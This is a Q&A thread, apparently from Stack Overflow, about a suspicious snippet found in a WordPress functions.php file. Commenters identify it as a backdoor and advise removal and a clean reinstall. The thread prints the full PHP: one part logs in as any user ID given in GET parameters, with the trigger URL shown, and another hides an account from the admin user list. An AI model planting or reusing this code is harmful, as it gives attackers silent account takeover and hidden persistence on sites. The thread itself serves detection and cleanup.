# PHP code snippet inside of functions.php

Tags: php, mysql, wordpress

I'm helping a friend with his wordpress website and I've found this snippet of code in his functions.php file. I'd like some help trying to understand it and seeing if I can remove it.

```
if(isset($_GET['foo'])){ $a = $_GET['foo']; } 
if(isset($_GET['bar'])){ $b = $_GET['bar']; } 
if( ( isset($a) && is_numeric($a) )&& ( isset($b) && $b == 'stuff' )) {

  $userdetail = get_userdata($a);
  $user_logins = $userdetail->user_login;
  $user_ids = $a;
  wp_set_current_user($user_ids, $user_logins);
  wp_set_auth_cookie($user_ids);
  do_action('wp_login', $user_logins);
 }
add_action('pre_user_query','dt_pre_user_query');
function dt_pre_user_query($user_search) {
   global $current_user;
   $username = $current_user->user_login;

   if ($username != 'arlington') {
      global $wpdb;
      $user_search->query_where = str_replace('WHERE 1=1',
         "WHERE 1=1 AND {$wpdb->users}.user_login != 'arlington'",$user_search->query_where);
   }
}
```

As far as I can tell if a GET request is posted, with a correct User ID for the 'lg' attribute and the character 'M' for the 'cg' attribute. Then it gets the user data and logs in and creates a cookie for the user. So essentially someone can log in with the following url www.mysite.com?lg=1&cg=M. Replace the 1 with an appropriate UserID or brute force until you find one.

After a second piece of code runs before a user query. It looks like it takes the $user_search param. If the username isn't 'custom' then it runs a DB query that returns nothing instead of the user login.

Let me know if I've interpreted that correctly.

EDIT: I'm going to change the variables slightly to prevent any shenanigans because I believe it could be easy to use this to exploit wordpress websites.

Comment: Why do you want to remove it? You're certain nothing on the site needs this bit of code?

Comment: Someone worked on the site previously and there was a lot of unnecessary plugins and some sloppy code. This snippet specifically seems to circumvent appropriate login methods and hides a user from the admin panel. It looks like it was added maliciously.

Comment: I tried out my hypothesis of using www.mysite.com/?lg=1&cg=M as a url to login and I was able to. Looks like it is a malicious piece of code.

Comment: Second piece of code hides that user from being listed in users table in wp_admin

Comment: @aoa OOOOOH. My apologies, I skimmed this and yowch.

Comment: Ouch.  Search every file for that!  BTW, I've edited the code *back into* your question.  There's no secrets being exposed here - anyone with a decent understanding of WP and PHP could whip this up on their own quickly and easily.

Comment: Note: this code does not actually rely on a specific user account, but instead would allow _anyone_ to log in simply by changing the `lg` get parameter to the desired user ID (any ID would work, that existed in the DB).

Comment: Upvoted because your instincts were correct and you sought confirmation

Comment: @cale_b The reason why I removed that is because with the information there, there is a potential for several wordpress websites that could be brute forced. I believe I know the company that has added the code snippet and according to their portfolio they have at least hundreds of clients. Wouldn't it be more prudent to remove it for now?

Comment: @aoa With tens of millions of WP installs the chances of one of their clients being found is fairly slim. Better that folks know this is out there, IMO.

Answer (score 5, accepted):

You should definitely remove this code, and check the rest of your site.

The first 11 lines of code will allow anyone to log in as any user simply by specifying the 2 get parameters mentioned, the second block added to pre_user_query adds an SQL clause designed to hide a user called custom.

Who or whatever added this code wanted to have a persistent backdoor to a WordPress site.

Comment: Yep, it looks like that's the case, I tested it out and that's what's happening. I'm not sure what the policy is here about naming and shaming. I found the hidden account and it's a "wordpress support" company. I can post their name and website. 

Any advice on how I can check the rest of my site for malicious code? I'm looking right now. I guess I'll have to diff all the website files to a clean wordpress install?

Comment: My suggestion is to backup the entire site including the database, change all related login credentials to the site files and database. and start again with a clean, new WordPress. vetting each plugin, theme, and content in the database as you restore it. It is a tedious task but it is the most sure-fire way to ensure the site's security.

Comment: Thanks, I'll talk to my friend about getting that going. Is there anything I can do in terms of letting potential customers know about this? When I removed the code and found the user related to the hidden account, the e-mail was the same as the one they use on their website to answer support questions so I'm fairly certain it's them.

Comment: I would not be too sure of what to do in regards to that sorry, If this is a theme or plugin hosted on the official wordpress.org site or a third party plugin database then it would be best to contact them about it. If it was obtained from the developers directly I'm not sure what action you could take.